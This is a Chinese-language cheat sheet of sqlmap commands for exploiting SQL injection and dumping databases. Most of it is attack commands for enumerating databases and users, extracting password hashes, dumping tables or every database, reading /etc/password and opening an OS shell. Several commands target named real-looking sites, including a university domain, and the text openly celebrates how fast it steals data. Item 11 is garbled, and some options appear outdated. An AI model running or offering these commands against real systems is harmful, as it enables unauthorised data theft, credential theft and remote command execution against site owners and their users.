SQLmap注入笔记
sqlmap.py -u "url" --tables 列出数据库中的表
( --tables:列出表)
sqlmap.py -u "url" -T 表 --columns 列出表中字段
-D:指定数据库名称
-T:指定要列出字段的表
--columns:指定列出字段
sqlmap.py -u "url" -T userb -C "帐号,密码" --dump
-C :指定要暴的字段
--dump:将结果导出
真正正确的语句?
SQLMAP注入拖库常用命令
SQLMAP是一款开源的渗透测试程序,它可以自动探测和利用SQL注入漏洞来获得我们想要的数据。
我们可以利用它执行特定的命令、查看文件、获取各种数据;当然,最猥琐的是它利用注入点拖库的速率还是灰常让人满意的。
#> ./sqlmap.py -u http://www.cqiyc.com/about.asp?ModuleId=534 -v 1 --dbs // 列举数据库
#> ./sqlmap.py -u http://pcfpci.zzu.edu.cn/news/show.asp?id=3919 -v 1 --current-db // 当前数据库
#>./sqlmap.py -u http://pcfpci.zzu.edu.cn/news/show.asp?id=3919 -v 1 --users // 列数据库用户
#> ./sqlmap.py -u http://pcfpci.zzu.edu.cn/news/show.asp?id=3919 -v 1 --current-user // 当前用户
#> ./sqlmap.py -u http://pcfpci.zzu.edu.cn/news/show.asp?id=3919 -v 1 --tables -D 20100705 // 列举数据库的表名
#> ./sqlmap.py -u http://pcfpci.zzu.edu.cn/news/show.asp?id=3919 -v 1 --columns -T “表名” -D “数据库” // 获取表的列名
#>./sqlmap.py -u http://pcfpci.zzu.edu.cn/news/show.asp?id=3919 -v 1 --dump -C “字段,字段” -T “表名” -D “数据库” // 获取表中的数据,包含列
已经开始拖库了,SQLMAP是非常人性化的,它会将获取的数据存储sqlmap/output/中、、、
1)判断当前用户是否是dba
python sqlmap.py -u "url" --is-dba -v 1
2)--users:列出数据库管理系统用户
python sqlmap.py -u "url" --users -v 0
3)--passwords:数据库用户密码(hash)
python sqlmap.py -u "url" --passwords -v 0
python sqlmap.py -u "url" --passwords -U sa -v 0
4)查看用户权限
python sqlmap.py -u "url" --privileges -v 0
python sqlmap.py -u "url" --privileges -U postgres -v 0
5)--dbs可以利用的数据库
python sqlmap.py -u "url" --dbs -v 0
6)--tables列数据库表
python sqlmap.py -u "url" --tables -D "jdf"
-D:指定数据名称
7)--columns 列出表中的列名
python sqlmap.py -u "url" --columns -T "user" -D "jdf" -v 1
-T:指定表名,-D:指定库名
8)--dump列表中指定列的内容
python sqlmap.py -u "url" --dump -C "name" -T "user" -D "jdf"
-C:可以指定字段
指定列的范围为2到4
python sqlmap.py -u "url" --dump -T "users" -D "xyyl" --start 2 --stop 4 -v 0
9)--dumap-all列出所有数据库,所有表内容
python sqlmap.py -u "url" --dump-all -v 0
只列出用户自己新建的数据库和表的内容
python sqlmap.py -u "url" --dump-all --exclude-sysdbs -v 0
10)--file读取文件内容[load_file()函数]
python sqlmap.py -u "url" --file /etc/password
11)执行SQL
python sqlmap.py -u "sqlmap.py -u "url" --is-dba -v 1" --os-shell
12)-p 指定参数
python sqlmap.py -u "url" -v 1 -p "id"
-p可以指定多参数-p "cat,id"
13)POST提交
python sqlmap.py -u "url" --method POST --data "id=1"
14)COOKIE提交
python sqlmap.py -u "url" --cookie "id=1" -v 1
cookie值可以由TamperData抓取
15)refer欺骗
python sqlmap.py -u "url" --refer "url" -v 3
16)使用自定义user-agent或者user-agents.txt
python sqlmap.py -u "url" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3
python sqlmap.py -u "url" -v 1 -a "./txt/user-agents.txt"
17)使用多线程猜解
python sqlmap.py -u "url" -v 1 --current-user --threads 3
18)指定数据库,绕过SQLMAP的自动检测
python sqlmap.py -u "url" -v 2 --dbms "PostgreSQL"
19)指定操作系统绕过SQLMAP自动检测
python sqlmap.py -u "url" -v 2 --os "Windows"
20)--prefix and --postfix自定义payload
python sqlmap.py -u "url" -v 3 -p "id" --prefix "'" --postfix "and 'test'='test"
21)union注入测试
python sqlmap.py -u "url" --union-test -v -1
22)配合order by
python sqlmap.py -u "url" --union-test --union-tech orderby -v 1
23)python sqlmap.py -u "url" -v 1 --union-use --banner
24)python sqlmap.py -u "url" -v 5 --union-use --current-user
25)python sqlmap.py -u "url" -v 1 --union-use --dbs